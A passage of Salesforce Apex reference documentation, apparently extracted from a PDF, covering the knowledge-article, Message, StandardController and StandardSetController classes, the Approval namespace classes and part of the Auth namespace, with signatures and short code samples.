public class AgentContributionArticleController {
// The constructor must take a ApexPages.KnowledgeArticleVersionStandardController as
467
Reference
KnowledgeArticleVersionStandardController Class
an argument
public AgentContributionArticleController(
ApexPages.KnowledgeArticleVersionStandardController ctl) {
// This is the SObject for the new article.
//It can optionally be cast to the proper article type.
// For example, FAQ__kav article = (FAQ__kav) ctl.getRecord();
SObject article = ctl.getRecord();
// This returns the ID of the case that was closed.
String sourceId = ctl.getSourceId();
Case c = [SELECT Subject, Description FROM Case WHERE Id=:sourceId];
// This overrides the default behavior of pre-filling the
// title of the article with the subject of the closed case.
article.put('title', 'From Case: '+c.subject);
article.put('details__c',c.description);
// Only one category per category group can be specified.
ctl.selectDataCategory('Geography','USA');
ctl.selectDataCategory('Topics','Maintenance');
}
}
/** Test class for the custom extension controller.
*/
@isTest
private class AgentContributionArticleControllerTest {
static testMethod void testAgentContributionArticleController() {
String caseSubject = 'my test';
String caseDesc = 'my test description';
Case c = new Case();
c.subject= caseSubject;
c.description = caseDesc;
insert c;
String caseId = c.id;
System.debug('Created Case: ' + caseId);
ApexPages.currentPage().getParameters().put('sourceId', caseId);
ApexPages.currentPage().getParameters().put('sfdc.override', '1');
ApexPages.KnowledgeArticleVersionStandardController ctl =
new ApexPages.KnowledgeArticleVersionStandardController(new FAQ__kav());
new AgentContributionArticleController(ctl);
System.assertEquals(caseId, ctl.getSourceId());
System.assertEquals('From Case: '+caseSubject, ctl.getRecord().get('title'));
System.assertEquals(caseDesc, ctl.getRecord().get('details__c'));
}
}
If you created the custom extension controller for the purpose described in the previous example (that is, to modify submitted-via-case
articles), complete the following steps after creating the class:
1. Log into your Salesforce organization and from Setup, click Customize > Knowledge > Settings.
468
Reference
KnowledgeArticleVersionStandardController Class
2. Click Edit.
3. Assign the class to the Use Apex customization field. This associates the article type specified in the new class with the
article type assigned to closed cases.
4. Click Save.
IN THIS SECTION:
KnowledgeArticleVersionStandardController Constructors
KnowledgeArticleVersionStandardController Methods
SEE ALSO:
StandardController Class
KnowledgeArticleVersionStandardController Constructors
The following are constructors for KnowledgeArticleVersionStandardController.
IN THIS SECTION:
KnowledgeArticleVersionStandardController(SObject)
Creates a new instance of the ApexPages.KnowledgeArticleVersionStandardController class using the
specified knowledge article.
KnowledgeArticleVersionStandardController(SObject)
Creates a new instance of the ApexPages.KnowledgeArticleVersionStandardController class using the specified
knowledge article.
Signature
public KnowledgeArticleVersionStandardController(SObject article)
Parameters
article
Type: SObject
The knowledge article, such as FAQ_kav.
KnowledgeArticleVersionStandardController Methods
The following are instance methods for KnowledgeArticleVersionStandardController.
IN THIS SECTION:
getSourceId()
Returns the ID for the source object record when creating a new article from another object.
469
Reference
Message Class
setDataCategory(String, String)
Specifies a default data category for the specified data category group when creating a new article.
getSourceId()
Returns the ID for the source object record when creating a new article from another object.
Signature
public String getSourceId()
Return Value
Type: String
setDataCategory(String, String)
Specifies a default data category for the specified data category group when creating a new article.
Signature
public Void setDataCategory(String categoryGroup, String category)
Parameters
categoryGroup
Type: String
category
Type: String
Return Value
Type: Void
Message Class
Contains validation errors that occur when the end user saves the page when using a standard controller.
Namespace
ApexPages
Usage
When using a standard controller, all validation errors, both custom and standard, that occur when the end user saves the page are
automatically added to the page error collections. If there is an inputField component bound to the field with an error, the message
is added to the components error collection. All messages are added to the pages error collection. For more information, see Validation
Rules and Standard Controllers in the Visualforce Developer's Guide.
If your application uses a custom controller or extension, you must use the message class for collecting errors.
470
Reference
Message Class
Instantiation
In a custom controller or controller extension, you can instantiate a Message in one of the following ways:
where ApexPages.severity is the enum that is determines how severe a message is, and summary is the String used to
summarize the message. For example:
ApexPages.Message myMsg = new ApexPages.Message(ApexPages.Severity.FATAL, 'my error
msg');
where ApexPages. severity is the enum that is determines how severe a message is, summary is the String used to
summarize the message, and detail is the String used to provide more detailed information about the error.
ApexPages.Severity Enum
Using the ApexPages.Severity enum values, specify the severity of the message. The following are the valid values:
CONFIRM
ERROR
FATAL
INFO
WARNING
All enums have access to standard methods, such as name and value.
IN THIS SECTION:
Message Constructors
Message Methods
Message Constructors
The following are constructors for Message.
IN THIS SECTION:
Message(ApexPages.Severity, String)
Creates a new instance of the ApexPages.Message class using the specified message severity and summary.
Message(ApexPages.Severity, String, String)
Creates a new instance of the ApexPages.Message class using the specified message severity, summary, and message detail.
Message(ApexPages.Severity, String, String, String)
Creates a new instance of the ApexPages.Message class using the specified severity, summary, detail, and component ID.
Message(ApexPages.Severity, String)
Creates a new instance of the ApexPages.Message class using the specified message severity and summary.
471
Reference
Message Class
Signature
public Message(ApexPages.Severity severity, String summary)
Parameters
severity
Type: ApexPages.Severity
The severity of a Visualforce message.
summary
Type: String
The summary Visualforce message.
Signature
public Message(ApexPages.Severity severity, String summary, String detail)
Parameters
severity
Type: ApexPages.Severity
The severity of a Visualforce message.
summary
Type: String
The summary Visualforce message.
detail
Type: String
The detailed Visualforce message.
Signature
public Message(ApexPages.Severity severity, String summary, String detail, String id)
Parameters
severity
Type: ApexPages.Severity
The severity of a Visualforce message.
472
Reference
Message Class
summary
Type: String
The summary Visualforce message.
detail
Type: String
The detailed Visualforce message.
id
Type: String
The ID of the Visualforce component to associate with the message, for example, a form field with an error.
Message Methods
The following are methods for Message. All are instance methods.
IN THIS SECTION:
getComponentLabel()
Returns the label of the associated inputField component. If no label is defined, this method returns null.
getDetail()
Returns the value of the detail parameter used to create the message. If no detail String was specified, this method returns null.
getSeverity()
Returns the severity enum used to create the message.
getSummary()
Returns the summary String used to create the message.
getComponentLabel()
Returns the label of the associated inputField component. If no label is defined, this method returns null.
Signature
public String getComponentLabel()
Return Value
Type: String
getDetail()
Returns the value of the detail parameter used to create the message. If no detail String was specified, this method returns null.
Signature
public String getDetail()
473
Reference
StandardController Class
Return Value
Type: String
getSeverity()
Returns the severity enum used to create the message.
Signature
public ApexPages.Severity getSeverity()
Return Value
Type: ApexPages.Severity
getSummary()
Returns the summary String used to create the message.
Signature
public String getSummary()
Return Value
Type: String
StandardController Class
Use a StandardController when defining an extension for a standard controller.
Namespace
ApexPages
Usage
StandardController objects reference the pre-built Visualforce controllers provided by Salesforce. The only time it is necessary to refer
to a StandardController object is when defining an extension for a standard controller. StandardController is the data type of the single
argument in the extension class constructor.
Instantiation
You can instantiate a StandardController in the following way:
ApexPages.StandardController sc = new ApexPages.StandardController(sObject);
474
Reference
StandardController Class
Example
The following example shows how a StandardController object can be used in the constructor for a standard controller extension:
public class myControllerExtension {
private final Account acct;
// The extension constructor initializes the private member
// variable acct by using the getRecord method from the standard
// controller.
public myControllerExtension(ApexPages.StandardController stdController) {
this.acct = (Account)stdController.getRecord();
}
public String getGreeting() {
return 'Hello ' + acct.name + ' (' + acct.id + ')';
}
}
The following Visualforce markup shows how the controller extension from above can be used in a page:
<apex:page standardController="Account" extensions="myControllerExtension">
{!greeting} <p/>
<apex:form>
<apex:inputField value="{!account.name}"/> <p/>
<apex:commandButton value="Save" action="{!save}"/>
</apex:form>
</apex:page>
IN THIS SECTION:
StandardController Constructors
StandardController Methods
StandardController Constructors
The following are constructors for StandardController.
IN THIS SECTION:
StandardController(SObject)
Creates a new instance of the ApexPages.StandardController class for the specified standard or custom object.
StandardController(SObject)
Creates a new instance of the ApexPages.StandardController class for the specified standard or custom object.
Signature
public StandardController(SObject controllerSObject)
475
Reference
StandardController Class
Parameters
controllerSObject
Type: SObject
A standard or custom object.
StandardController Methods
The following are methods for StandardController. All are instance methods.
IN THIS SECTION:
addFields(List<String>)
When a Visualforce page is loaded, the fields accessible to the page are based on the fields referenced in the Visualforce markup.
This method adds a reference to each field specified in fieldNames so that the controller can explicitly access those fields as
well.
cancel()
Returns the PageReference of the cancel page.
delete()
Deletes record and returns the PageReference of the delete page.
edit()
Returns the PageReference of the standard edit page.
getId()
Returns the ID of the record that is currently in context, based on the value of the id query string parameter in the Visualforce page
URL.
getRecord()
Returns the record that is currently in context, based on the value of the id query string parameter in the Visualforce page URL.
reset()
Forces the controller to reacquire access to newly referenced fields. Any changes made to the record prior to this method call are
discarded.
save()
Saves changes and returns the updated PageReference.
view()
Returns the PageReference object of the standard detail page.
addFields(List<String>)
When a Visualforce page is loaded, the fields accessible to the page are based on the fields referenced in the Visualforce markup. This
method adds a reference to each field specified in fieldNames so that the controller can explicitly access those fields as well.
Signature
public Void addFields(List<String> fieldNames)
476
Reference
StandardController Class
Parameters
fieldNames
Type: List<String>
Return Value
Type: Void
Usage
This method should be called before a record has been loadedtypically, it's called by the controller's constructor. If this method is
called outside of the constructor, you must use the reset() method before calling addFields().
The strings in fieldNames can either be the API name of a field, such as AccountId, or they can be explicit relationships to fields,
such as foo__r.myField__c.
This method is only for controllers used by dynamicVisualforce bindings.
cancel()
Returns the PageReference of the cancel page.
Signature
public System.PageReference cancel()
Return Value
Type: System.PageReference
delete()
Deletes record and returns the PageReference of the delete page.
Signature
public System.PageReference delete()
Return Value
Type: System.PageReference
edit()
Returns the PageReference of the standard edit page.
Signature
public System.PageReference edit()
477
Reference
StandardController Class
Return Value
Type: System.PageReference
getId()
Returns the ID of the record that is currently in context, based on the value of the id query string parameter in the Visualforce page
URL.
Signature
public String getId()
Return Value
Type: String
getRecord()
Returns the record that is currently in context, based on the value of the id query string parameter in the Visualforce page URL.
Signature
public SObject getRecord()
Return Value
Type: sObject
Usage
Note that only the fields that are referenced in the associated Visualforce markup are available for querying on this SObject. All other
fields, including fields from any related objects, must be queried using a SOQL expression.
Tip: You can work around this restriction by including a hidden component that references any additional fields that you want
to query. Hide the component from display by setting the component's rendered attribute to false.
Example
<apex:outputText
value="{!account.billingcity}
{!account.contacts}"
rendered="false"/>
reset()
Forces the controller to reacquire access to newly referenced fields. Any changes made to the record prior to this method call are
discarded.
Signature
public Void reset()
478
Reference
StandardSetController Class
Return Value
Type: Void
Usage
This method is only used if addFields is called outside the constructor, and it must be called directly before addFields.
This method is only for controllers used by dynamicVisualforce bindings.
save()
Saves changes and returns the updated PageReference.
Signature
public System.PageReference save()
Return Value
Type: System.PageReference
view()
Returns the PageReference object of the standard detail page.
Signature
public System.PageReference view()
Return Value
Type: System.PageReference
StandardSetController Class
StandardSetController objects allow you to create list controllers similar to, or as extensions of, the pre-built Visualforce list
Namespace
ApexPages
Usage
The StandardSetController class also contains a prototype object. This is a single sObject contained within the Visualforce
StandardSetController class. If the prototype object's fields are set, those values are used during the save action, meaning that the values
are applied to every record in the set controller's collection. This is useful for writing pages that perform mass updates (applying identical
changes to fields within a collection of objects).
Note: Fields that are required in other Salesforce objects will keep the same requiredness when used by the prototype object.
479
Reference
StandardSetController Class
Instantiation
You can instantiate a StandardSetController in either of the following ways:
From a list of sObjects:
List<account> accountList = [SELECT Name FROM Account LIMIT 20];
ApexPages.StandardSetController ssc = new ApexPages.StandardSetController(accountList);
Note: The maximum record limit for StandardSetController is 10,000 records. Instantiating StandardSetController using a query
locator returning more than 10,000 records causes a LimitException to be thrown. However, instantiating StandardSetController
with a list of more than 10,000 records doesnt throw an exception, and instead truncates the records to the limit.
Example
The following example shows how a StandardSetController object can be used in the constructor for a custom list controller:
public class opportunityList2Con {
// ApexPages.StandardSetController must be instantiated
// for standard list controllers
public ApexPages.StandardSetController setCon {
get {
if(setCon == null) {
setCon = new ApexPages.StandardSetController(Database.getQueryLocator(
[SELECT Name, CloseDate FROM Opportunity]));
}
return setCon;
}
set;
}
// Initialize setCon and return a list of records
public List<Opportunity> getOpportunities() {
return (List<Opportunity>) setCon.getRecords();
}
}
The following Visualforce markup shows how the controller above can be used in a page:
<apex:page controller="opportunityList2Con">
<apex:pageBlock>
<apex:pageBlockTable value="{!opportunities}" var="o">
<apex:column value="{!o.Name}"/>
<apex:column value="{!o.CloseDate}"/>
</apex:pageBlockTable>
</apex:pageBlock>
</apex:page>
480
Reference
StandardSetController Class
IN THIS SECTION:
StandardSetController Constructors
StandardSetController Methods
StandardSetController Constructors
The following are constructors for StandardSetController.
IN THIS SECTION:
StandardSetController(Database.QueryLocator)
Creates a new instance of the ApexPages.StandardSetController class for the list of sObjects returned by the query
locator.
StandardSetController(List<SObject>)
Creates a new instance of the ApexPages.StandardSetController class for the specified list of standard or custom
objects.
StandardSetController(Database.QueryLocator)
Creates a new instance of the ApexPages.StandardSetController class for the list of sObjects returned by the query locator.
Signature
public StandardSetController(Database.QueryLocator SObjectList)
Parameters
SObjectList
Type: Database.QueryLocator
A query locator returning a list of sObjects.
StandardSetController(List<SObject>)
Creates a new instance of the ApexPages.StandardSetController class for the specified list of standard or custom objects.
Signature
public StandardSetController(List<SObject> controllerSObjects)
Parameters
controllerSObjects
Type: List<SObject>
A List of standard or custom objects.
StandardSetController Methods
The following are methods for StandardSetController. All are instance methods.
481
Reference
StandardSetController Class
IN THIS SECTION:
cancel()
Returns the PageReference of the original page, if known, or the home page.
first()
Returns the first page of records.
getCompleteResult()
Indicates whether there are more records in the set than the maximum record limit. If this is false, there are more records than you
can process using the list controller. The maximum record limit is 10,000 records.
getFilterId()
Returns the ID of the filter that is currently in context.
getHasNext()
Indicates whether there are more records after the current page set.
getHasPrevious()
Indicates whether there are more records before the current page set.
getListViewOptions()
Returns a list of the listviews available to the current user.
getPageNumber()
Returns the page number of the current page set. Note that the first page returns 1.
getPageSize()
Returns the number of records included in each page set.
getRecord()
Returns the sObject that represents the changes to the selected records. This retrieves the prototype object contained within the
class, and is used for performing mass updates.
getRecords()
Returns the list of sObjects in the current page set. This list is immutable, i.e. you can't call clear() on it.
getResultSize()
Returns the number of records in the set.
getSelected()
Returns the list of sObjects that have been selected.
last()
Returns the last page of records.
next()
Returns the next page of records.
previous()
Returns the previous page of records.
save()
Inserts new records or updates existing records that have been changed. After this operation is finished, it returns a PageReference
to the original page, if known, or the home page.
setFilterID(String)
Sets the filter ID of the controller.
482
Reference
StandardSetController Class
setpageNumber(Integer)
Sets the page number.
setPageSize(Integer)
Sets the number of records in each page set.
setSelected(sObject[])
Set the selected records.
cancel()
Returns the PageReference of the original page, if known, or the home page.
Signature
public System.PageReference cancel()
Return Value
Type: System.PageReference
first()
Returns the first page of records.
Signature
public Void first()
Return Value
Type: Void
getCompleteResult()
Indicates whether there are more records in the set than the maximum record limit. If this is false, there are more records than you can
process using the list controller. The maximum record limit is 10,000 records.
Signature
public Boolean getCompleteResult()
Return Value
Type: Boolean
getFilterId()
Returns the ID of the filter that is currently in context.
483
Reference
StandardSetController Class
Signature
public String getFilterId()
Return Value
Type: String
getHasNext()
Indicates whether there are more records after the current page set.
Signature
public Boolean getHasNext()
Return Value
Type: Boolean
getHasPrevious()
Indicates whether there are more records before the current page set.
Signature
public Boolean getHasPrevious()
Return Value
Type: Boolean
getListViewOptions()
Returns a list of the listviews available to the current user.
Signature
public System.SelectOption getListViewOptions()
Return Value
Type: System.SelectOption[]
getPageNumber()
Returns the page number of the current page set. Note that the first page returns 1.
Signature
public Integer getPageNumber()
484
Reference
StandardSetController Class
Return Value
Type: Integer
getPageSize()
Returns the number of records included in each page set.
Signature
public Integer getPageSize()
Return Value
Type: Integer
getRecord()
Returns the sObject that represents the changes to the selected records. This retrieves the prototype object contained within the class,
and is used for performing mass updates.
Signature
public sObject getRecord()
Return Value
Type: sObject
getRecords()
Returns the list of sObjects in the current page set. This list is immutable, i.e. you can't call clear() on it.
Signature
public sObject[] getRecords()
Return Value
Type: sObject[]
getResultSize()
Returns the number of records in the set.
Signature
public Integer getResultSize()
485
Reference
StandardSetController Class
Return Value
Type: Integer
getSelected()
Returns the list of sObjects that have been selected.
Signature
public sObject[] getSelected()
Return Value
Type: sObject[]
last()
Returns the last page of records.
Signature
public Void last()
Return Value
Type: Void
next()
Returns the next page of records.
Signature
public Void next()
Return Value
Type: Void
previous()
Returns the previous page of records.
Signature
public Void previous()
Return Value
Type: Void
486
Reference
StandardSetController Class
save()
Inserts new records or updates existing records that have been changed. After this operation is finished, it returns a PageReference to
the original page, if known, or the home page.
Signature
public System.PageReference save()
Return Value
Type: System.PageReference
setFilterID(String)
Sets the filter ID of the controller.
Signature
public Void setFilterID(String filterId)
Parameters
filterId
Type: String
Return Value
Type: Void
setpageNumber(Integer)
Sets the page number.
Signature
public Void setpageNumber(Integer pageNumber)
Parameters
pageNumber
Type: Integer
Return Value
Type: Void
setPageSize(Integer)
Sets the number of records in each page set.
487
Reference
Approval Namespace
Signature
public Void setPageSize(Integer pageSize)
Parameters
pageSize
Type: Integer
Return Value
Type: Void
setSelected(sObject[])
Set the selected records.
Signature
public Void setSelected(sObject[] selectedRecords)
Parameters
selectedRecords
Type: sObject[]
Return Value
Type: Void
Approval Namespace
The Approval namespace provides classes and methods for approval processes.
The following are the classes in the Approval namespace.
IN THIS SECTION:
ProcessRequest Class
The ProcessRequest class is the parent class for the ProcessSubmitRequest and ProcessWorkitemRequest
classes. Use the ProcessRequest class to write generic Apex that can process objects from either class.
ProcessResult Class
After you submit a record for approval, use the ProcessResult class to process the results of an approval process.
ProcessSubmitRequest Class
Use the ProcessSubmitRequest class to submit a record for approval.
ProcessWorkitemRequest Class
Use the ProcessWorkitemRequest class for processing an approval request after it is submitted.
488
Reference
ProcessRequest Class
ProcessRequest Class
The ProcessRequest class is the parent class for the ProcessSubmitRequest and ProcessWorkitemRequest
classes. Use the ProcessRequest class to write generic Apex that can process objects from either class.
Namespace
Approval
Usage
The request must be instantiated via the child classes, ProcessSubmitRequest and ProcessWorkItemRequest.
ProcessRequest Methods
The following are methods for ProcessRequest. All are instance methods.
IN THIS SECTION:
getComments()
Returns the comments that have been added previously to the approval request.
getNextApproverIds()
Returns the list of user IDs of user specified as approvers.
setComments(String)
Sets the comments to be added to the approval request.
setNextApproverIds(ID[])
If the next step in your approval process is another Apex approval process, you specify exactly one user ID as the next approver. If
not, you cannot specify a user ID and this method must be null.
getComments()
Returns the comments that have been added previously to the approval request.
Signature
public String getComments()
Return Value
Type: String
getNextApproverIds()
Returns the list of user IDs of user specified as approvers.
Signature
public ID[] getNextApproverIds()
489
Reference
ProcessResult Class
Return Value
Type: ID[]
setComments(String)
Sets the comments to be added to the approval request.
Signature
public Void setComments(String comments)
Parameters
comments
Type: String
Return Value
Type: Void
setNextApproverIds(ID[])
If the next step in your approval process is another Apex approval process, you specify exactly one user ID as the next approver. If not,
you cannot specify a user ID and this method must be null.
Signature
public Void setNextApproverIds(ID[] nextApproverIds)
Parameters
nextApproverIds
Type: ID[]
Return Value
Type: Void
ProcessResult Class
After you submit a record for approval, use the ProcessResult class to process the results of an approval process.
Namespace
Approval
490
Reference
ProcessResult Class
Usage
A ProcessResult object is returned by the process method. You must specify the Approval namespace when creating an instance of
this class. For example:
Approval.ProcessResult result = Approval.process(req1);
ProcessResult Methods
The following are methods for ProcessResult. All are instance methods.
IN THIS SECTION:
getEntityId()
The ID of the record being processed.
getErrors()
If an error occurred, returns an array of one or more database error objects including the error code and description.
getInstanceId()
The ID of the approval process that has been submitted for approval.
getInstanceStatus()
The status of the current approval process. Valid values are: Approved, Rejected, Removed or Pending.
getNewWorkitemIds()
The IDs of the new items submitted to the approval process. There can be 0 or 1 approval processes.
isSuccess()
A Boolean value that is set to true if the approval process completed successfully; otherwise, it is set to false.
getEntityId()
The ID of the record being processed.
Signature
public String getEntityId()
Return Value
Type: String
getErrors()
If an error occurred, returns an array of one or more database error objects including the error code and description.
Signature
public Database.Error[] getErrors()
491
Reference
ProcessResult Class
Return Value
Type: Database.Error[]
getInstanceId()
The ID of the approval process that has been submitted for approval.
Signature
public String getInstanceId()
Return Value
Type: String
getInstanceStatus()
The status of the current approval process. Valid values are: Approved, Rejected, Removed or Pending.
Signature
public String getInstanceStatus()
Return Value
Type: String
getNewWorkitemIds()
The IDs of the new items submitted to the approval process. There can be 0 or 1 approval processes.
Signature
public ID[] getNewWorkitemIds()
Return Value
Type: ID[]
isSuccess()
A Boolean value that is set to true if the approval process completed successfully; otherwise, it is set to false.
Signature
public Boolean isSuccess()
Return Value
Type: Boolean
492
Reference
ProcessSubmitRequest Class
ProcessSubmitRequest Class
Use the ProcessSubmitRequest class to submit a record for approval.
Namespace
Approval
Usage
You must specify the Approval namespace when creating an instance of this class. The constructor for this class takes no arguments.
For example:
Approval.ProcessSubmitRequest psr = new Approval.ProcessSubmitRequest();
Inherited Methods
In addition to the methods listed, the ProcessSubmitRequest class has access to all the methods in its parent class, ProcessRequest
Class on page 489.
getComments()
getNextApproverIds()
setComments(String)
setNextApproverIds(ID[])
Example
To view sample code, refer to Approval Processing Example on page 293.
ProcessSubmitRequest Methods
The following are methods for ProcessSubmitRequest. All are instance methods.
IN THIS SECTION:
getObjectId()
Returns the ID of the record that has been submitted for approval. For example, it can return an account, contact, or custom object
record.
getProcessDefinitionNameOrId()
Returns the developer name or ID of the process definition.
getSkipEntryCriteria()
If getProcessDefinitionNameOrId() returns a value other than null, getSkipEntryCriteria() determines
whether to evaluate the entry criteria for the process (true) or not (false).
getSubmitterId()
Returns the user ID of the submitter requesting the approval record. The user must be one of the allowed submitters in the process
definition setup.
493
Reference
ProcessSubmitRequest Class
setObjectId(String)
Sets the ID of the record to be submitted for approval. For example, it can specify an account, contact, or custom object record.
setProcessDefinitionNameOrId(String)
Sets the developer name or ID of the process definition to be evaluated.
setSkipEntryCriteria(Boolean)
If the process definition name or ID is not null, setSkipEntryCriteria() determines whether to evaluate the entry criteria
for the process (true) or not (false).
setSubmitterId(String)
Sets the user ID of the submitter requesting the approval record. The user must be one of the allowed submitters in the process
definition setup. If you dont set a submitter ID, the process uses the current user as the submitter.
getObjectId()
Returns the ID of the record that has been submitted for approval. For example, it can return an account, contact, or custom object
record.
Signature
public String getObjectId()
Return Value
Type: String
getProcessDefinitionNameOrId()
Returns the developer name or ID of the process definition.
Signature
public String getProcessDefinitionNameOrId()
Return Value
Type: String
Usage
The default is null. If the return value is null, when a user submits a record for approval Salesforce evaluates the entry criteria for all
processes applicable to the user.
getSkipEntryCriteria()
If getProcessDefinitionNameOrId() returns a value other than null, getSkipEntryCriteria() determines
whether to evaluate the entry criteria for the process (true) or not (false).
Signature
public Boolean getSkipEntryCriteria()
494
Reference
ProcessSubmitRequest Class
Return Value
Type: Boolean
getSubmitterId()
Returns the user ID of the submitter requesting the approval record. The user must be one of the allowed submitters in the process
definition setup.
Signature
public String getSubmitterId()
Return Value
Type: String
setObjectId(String)
Sets the ID of the record to be submitted for approval. For example, it can specify an account, contact, or custom object record.
Signature
public Void setObjectId(String Id)
Parameters
Id
Type: String
Return Value
Type: Void
setProcessDefinitionNameOrId(String)
Sets the developer name or ID of the process definition to be evaluated.
Signature
public Void setProcessDefinitionNameOrId(String)
Parameters
nameOrId
Type: String
The process definition developer name or process definition ID. The record is submitted to this specific process. If set to null,
submission of a record approval follows standard evaluation; that is, every entry criteria of the process definition in the process order
is evaluated and the one that satisfies is picked and submitted.
495
Reference
ProcessSubmitRequest Class
Return Value
Type: Void
Usage
If the process definition name or ID is not set via this method, then by default it is null. If it is null, the submission of a record for approval
evaluates entry criteria for all processes applicable to the submitter. The order of evaluation is based on the process order of the setup.
setSkipEntryCriteria(Boolean)
If the process definition name or ID is not null, setSkipEntryCriteria() determines whether to evaluate the entry criteria for
the process (true) or not (false).
Signature
public Void setSkipEntryCriteria(Boolean entryCriteria)
Parameters
entryCriteria
Type: Boolean
If set to true, request submission skips the evaluation of entry criteria for the process set in setProcessDefinitionNameOrId(String)
on page 495. If the process definition name or ID is not specified, this argument is ignored and standard evaluation is followed based
on process order. By default, the entry criteria is not skipped if its not set by this method.
Return Value
Type: Void
setSubmitterId(String)
Sets the user ID of the submitter requesting the approval record. The user must be one of the allowed submitters in the process definition
setup. If you dont set a submitter ID, the process uses the current user as the submitter.
Signature
public Void setSubmitterId(String userID)
Parameters
userID
Type: String
The user ID on behalf of which the record is submitted. If set to null, the current user is the submitter. If the submitter is not set
with this method, the default submitter is null (the current user).
Return Value
Type: Void
496
Reference
ProcessWorkitemRequest Class
ProcessWorkitemRequest Class
Use the ProcessWorkitemRequest class for processing an approval request after it is submitted.
Namespace
Approval
Usage
You must specify the Approval namespace when creating an instance of this class. The constructor for this class takes no arguments.
For example:
Approval.ProcessWorkitemRequest pwr = new Approval.ProcessWorkitemRequest();
Inherited Methods
In addition to the methods listed, the ProcessWorkitemRequest class has access to all the methods in its parent class,
ProcessRequest Class:
getComments()
getNextApproverIds()
setComments(String)
setNextApproverIds(ID[])
ProcessWorkitemRequest Methods
The following are methods for ProcessWorkitemRequest. All are instance methods.
IN THIS SECTION:
getAction()
Returns the type of action already associated with the approval request. Valid values are: Approve, Reject, or Removed.
getWorkitemId()
Returns the ID of the approval request that is in the process of being approved, rejected, or removed.
setAction(String)
Sets the type of action to take for processing an approval request. Valid values are: Approve, Reject, or Removed. Only system
administrators can specify Removed.
setWorkitemId(String)
Sets the ID of the approval request that is being approved, rejected, or removed.
getAction()
Returns the type of action already associated with the approval request. Valid values are: Approve, Reject, or Removed.
Signature
public String getAction()
497
Reference
ProcessWorkitemRequest Class
Return Value
Type: String
getWorkitemId()
Returns the ID of the approval request that is in the process of being approved, rejected, or removed.
Signature
public String getWorkitemId()
Return Value
Type: String
setAction(String)
Sets the type of action to take for processing an approval request. Valid values are: Approve, Reject, or Removed. Only system administrators
can specify Removed.
Signature
public Void setAction(String s)
Parameters
s
Type: String
Return Value
Type: Void
setWorkitemId(String)
Sets the ID of the approval request that is being approved, rejected, or removed.
Signature
public Void setWorkitemId(String Id)
Parameters
Id
Type: String
Return Value
Type: Void
498
Reference
Auth Namespace
Auth Namespace
The Auth namespace provides an interface and classes for single sign-on into Salesforce and session security management.
The following is the interface in the Auth namespace.
IN THIS SECTION:
AuthConfiguration Class
Contains methods for configuring the settings for users to log in to a community, or a custom domain created using My Domain,
with an authentication provider, such as Facebook.
AuthToken Class
Contains methods for providing the access token associated with an authentication provider for an authenticated user, except for
the Janrain provider.
CommunitiesUtil Class
Contains methods for getting information about a community user.
RegistrationHandler Interface
Salesforce provides the ability to use an authentication provider, such as Facebook or Janrain, for single sign-on into Salesforce.
SessionManagement Class
Contains methods for customizing security levels, two-factor authentication, and trusted IP ranges for a current session.
SessionLevel Enum
An Auth.SessionLevel enum value is used by the SessionManagement.setSessionLevel method.
UserData Class
Stores user information for Auth.RegistrationHandler.
AuthConfiguration Class
Contains methods for configuring the settings for users to log in to a community, or a custom domain created using My Domain, with
an authentication provider, such as Facebook.
Namespace
Auth
Example
This example shows how to call some methods on the Auth.AuthConfiguration class. Before you can run this sample, you
need to provide valid values for the URLs and developer name.
String communityUrl = '<Add URL>';
String startUrl = '<Add URL>';
Auth.AuthConfiguration authConfig = new Auth.AuthConfiguration(communityUrl,startUrl);
List<AuthProvider> authPrvs = authConfig.getAuthProviders();
String bColor = authConfig.getBackgroundColor();
String fText = authConfig.getFooterText();
499
Reference
AuthConfiguration Class
AuthConfiguration Constructors
The following are constructors for AuthConfiguration.
AuthConfiguration(String, String)
Creates a new instance of the AuthConfiguration class using the specified community or custom domain URL and starting URL
for authenticated users.
Signature
public AuthConfiguration(String cURL, String startURL)
Parameters
cURL
Type: String
The URL for the community or custom domain.
startURL
Type: String
The page users see after successfully logging in to the community or custom domain.
AuthConfiguration Methods
The following are methods for AuthConfiguration. Use these methods to manage and customize authentication for a Salesforce
community.
IN THIS SECTION:
getAuthConfig()
Returns the AuthConfig sObject, which represents the authentication options, for a community or custom domain that was created
by using My Domain.
getAuthConfigProviders()
Returns the list of authentication providers configured for a community or custom domain.
getAuthProviders()
Returns the list of authentication providers available for a community or custom domain.
getAuthProviderSsoUrl(String, String, String)
Returns the single sign-on URL for a community or custom domain.
getBackgroundColor()
Returns the color for the background of the login page for a community.
getDefaultProfileForRegistration()
Returns the profile ID assigned to new community users.
500
Reference
AuthConfiguration Class
getFooterText()
Returns the text at the bottom of the login page for a community.
getLogoUrl()
Returns the location of the icon image at the bottom of the login page for a community.
getSamlProviders()
Returns the list of SAML-based authentication providers available for a community or custom domain.
getSamlSsoUrl(String, String, String)
Returns the single sign-on URL for a community or custom domain.
getSelfRegistrationEnabled()
Indicates whether the current community allows new users to create their own account by filling out a registration form.
getSelfRegistrationUrl()
Returns the location of the self-registration page for new users to sign up for an account with a community.
getStartUrl()
Returns the page of a community or custom domain displayed after a user logs in.
getUsernamePasswordEnabled()
Indicates whether the current community is set to display a login form asking for a username and password. You can configure the
community not to request a username and password if it is for unauthenticated users or users logging in with a third-party
authentication provider.
getAuthConfig()
Returns the AuthConfig sObject, which represents the authentication options, for a community or custom domain that was created by
using My Domain.
Signature
public AuthConfig getAuthConfig()
Return Value
Type: AuthConfig
The AuthConfig sObject for the community or custom domain.
getAuthConfigProviders()
Returns the list of authentication providers configured for a community or custom domain.
Signature
public List<AuthConfigProviders> getAuthConfigProviders()
Return Value
Type: List<AuthConfigProviders>
A list of authentication providers (AuthConfigProviders sObjects, which are children of the AuthProvider sObject).
501
Reference
AuthConfiguration Class
getAuthProviders()
Returns the list of authentication providers available for a community or custom domain.
Signature
public List<AuthProvider> getAuthProviders()
Return Value
Type: List<AuthProvider>
A list of authentication providers (AuthProvider sObjects) for the community or custom domain.
Signature
public static String getAuthProviderSsoUrl(String cUrl, String startUrl, String
developerName)
Parameters
cUrl
Type: String
The URL for the community or custom domain. If null or specified as an empty string, youll get the URL for a custom domain.
startUrl
Type: String
The page users see after successfully logging in to the community or custom domain..
developerName
Type: String
The unique name for the community or custom domain..
Return Value
Type: String
The Single Sign-On Initialization URL for the community or custom domain.
getBackgroundColor()
Returns the color for the background of the login page for a community.
Signature
public String getBackgroundColor()
502
Reference
AuthConfiguration Class
Return Value
Type: String
getDefaultProfileForRegistration()
Returns the profile ID assigned to new community users.
Signature
public String getDefaultProfileForRegistration()
Return Value
Type: String
The profile ID.
getFooterText()
Returns the text at the bottom of the login page for a community.
Signature
